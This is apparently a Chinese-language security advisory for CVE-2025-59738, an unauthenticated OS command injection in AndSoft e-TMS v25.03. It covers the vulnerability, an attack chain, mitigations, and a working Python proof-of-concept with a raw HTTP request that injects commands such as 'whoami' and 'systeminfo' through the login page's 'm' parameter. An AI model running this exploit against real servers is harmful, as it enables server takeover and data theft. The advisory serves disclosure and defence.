CVE-2025-59738：AndSoft e-TMS 操作系统命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-59738

漏洞类型

操作系统命令注入（OS Command Injection）

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59738 是 AndSoft 公司开发的 e-TMS（Electronic Transport Management System，电子运输管理系统）v25.03 版本中存在的一个高危操作系统命令注入漏洞。该漏洞的 CVSS 3.1 评分高达 9.8 分，属于严重级别。e-TMS 是一款广泛应用于物流和运输行业的管理系统，用于处理运输订单、车辆调度、货物跟踪等业务。由于该系统通常部署在企业核心业务环境中，一旦被攻击者利用，可能导致服务器完全失陷，敏感业务数据泄露，业务系统中断等严重后果。该漏洞由西班牙国家网络安全研究所（INCIBE）发现并协调披露。漏洞存在于 e-TMS 系统的登录页面文件 '/clt/LOGINFRM_BET.ASP' 中，具体涉及一个名为 'm' 的参数。攻击者无需任何身份认证，仅需通过网络发送精心构造的 POST 请求，即可向服务器注入并执行任意操作系统命令。由于该漏洞具有网络可达性（AV:N）、低攻击复杂度（AC:L）、无需权限（PR:N）、无需用户交互（UI:N）以及对机密性、完整性、可用性的高影响（C:H/I:H/A:H）等特征，使得该漏洞极易被远程攻击者武器化利用，对暴露在互联网上的 e-TMS 系统构成极大威胁。

技术细节

该漏洞属于典型的操作系统命令注入（OS Command Injection）漏洞，其根本原因是 e-TMS v25.03 版本的 '/clt/LOGINFRM_BET.ASP' 文件在处理用户输入时，未对 'm' 参数进行充分的过滤和验证，直接将用户可控的输入拼接到操作系统命令中执行。攻击者可以通过在 'm' 参数中注入 shell 元字符（如 ';'、'|'、'&&'、'||'、'`'、'$()' 等）来中断原有命令的执行，并插入任意恶意命令。由于该漏洞存在于登录页面（LOGINFRM_BET.ASP），且不需要任何身份认证即可访问，攻击者可以直接通过未认证的 POST 请求触发漏洞。具体利用方式为：攻击者构造包含恶意命令的 POST 请求，发送到目标服务器的 '/clt/LOGINFRM_BET.ASP' 端点，'m' 参数中携带命令注入 payload，服务器在处理该请求时会执行注入的操作系统命令。由于 ASP（Active Server Pages）通常运行在 Windows Server 上，注入的命令将以 Web 服务器进程的权限执行，攻击者可以执行任意系统命令，如读取敏感文件、建立反向连接、下载并执行恶意程序等，从而完全控制目标服务器。

攻击链分析

STEP 1

步骤1：信息收集与目标识别

攻击者通过 Shodan、Censys 等网络空间搜索引擎或端口扫描工具，识别暴露在互联网上的运行 AndSoft e-TMS v25.03 的服务器，确认目标系统的 IP 地址和端口。

STEP 2

步骤2：漏洞探测

攻击者向目标服务器的 '/clt/LOGINFRM_BET.ASP' 端点发送包含特殊字符（如分号、管道符等）的 POST 请求，通过时间延迟或错误信息等方式确认目标存在命令注入漏洞。

STEP 3

步骤3：构造恶意 Payload

攻击者精心构造包含操作系统命令的 payload，注入到 'm' 参数中。例如：'m=; whoami' 或 'm=; ipconfig' 等，以获取服务器信息。

STEP 4

步骤4：执行任意命令

通过发送构造好的 POST 请求，触发服务器执行注入的操作系统命令。由于无需认证，攻击者可以直接利用该漏洞。

STEP 5

步骤5：获取服务器控制权

攻击者通过命令注入执行更复杂的操作，如下载并执行恶意软件、建立反向 shell、创建新用户、修改系统配置等，从而完全控制目标服务器。

STEP 6

步骤6：横向移动与数据窃取

获得服务器控制权后，攻击者可以窃取 e-TMS 系统中的敏感运输数据、客户信息、财务数据等，并尝试在内网中进行横向移动，攻击其他系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59738 - AndSoft e-TMS OS Command Injection PoC
# Vulnerability: OS Command Injection in 'm' parameter of /clt/LOGINFRM_BET.ASP
# Affected Product: AndSoft e-TMS v25.03
# CVSS Score: 9.8 (Critical)

import requests

TARGET_URL = "http://target-host"
VULNERABLE_ENDPOINT = "/clt/LOGINFRM_BET.ASP"

def exploit_command_injection(target_url, command):
    """
    Exploit OS command injection via 'm' parameter
    """
    url = target_url.rstrip('/') + VULNERABLE_ENDPOINT
    
    # Inject OS command into the 'm' parameter
    payload = f"; {command}"
    
    data = {
        "m": payload
    }
    
    try:
        response = requests.post(url, data=data, timeout=10)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        print(f"[+] Response Body:\n{response.text[:2000]}")
        return response
    except Exception as e:
        print(f"[-] Error: {e}")
        return None

def check_vulnerability(target_url):
    """
    Check if target is vulnerable using time-based detection
    """
    url = target_url.rstrip('/') + VULNERABLE_ENDPOINT
    
    # Time-based payload using Windows ping command (ASP typically runs on Windows)
    payload = "; ping -n 5 127.0.0.1"
    
    data = {"m": payload}
    
    try:
        response = requests.post(url, data=data, timeout=15)
        return True
    except requests.exceptions.Timeout:
        print("[+] Target appears to be vulnerable (timeout detected)")
        return True
    except Exception as e:
        print(f"[-] Error during check: {e}")
        return False

if __name__ == "__main__":
    # Step 1: Verify vulnerability
    print("[*] Checking vulnerability...")
    if check_vulnerability(TARGET_URL):
        print("[+] Target is vulnerable!")
        
        # Step 2: Execute arbitrary command
        print("[*] Executing 'whoami' command...")
        exploit_command_injection(TARGET_URL, "whoami")
        
        # Step 3: Get system info
        print("[*] Executing 'systeminfo' command...")
        exploit_command_injection(TARGET_URL, "systeminfo")
    else:
        print("[-] Target does not appear to be vulnerable")

# Example raw HTTP request:
# POST /clt/LOGINFRM_BET.ASP HTTP/1.1
# Host: target-host
# Content-Type: application/x-www-form-urlencoded
# Content-Length: <length>
#
# m=;whoami

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在等待官方补丁发布期间，建议采取以下临时缓解措施：1）通过网络防火墙或安全组限制对 e-TMS 服务器的访问，仅允许可信 IP 地址访问；2）在反向代理或 WAF 上配置规则，拦截包含可疑 shell 元字符的 POST 请求；3）暂时禁用或限制 '/clt/LOGINFRM_BET.ASP' 端点的访问；4）监控服务器日志，检测是否存在异常的 POST 请求或可疑的命令执行行为；5）将 Web 服务器进程的运行权限降至最低，限制其对系统资源的访问。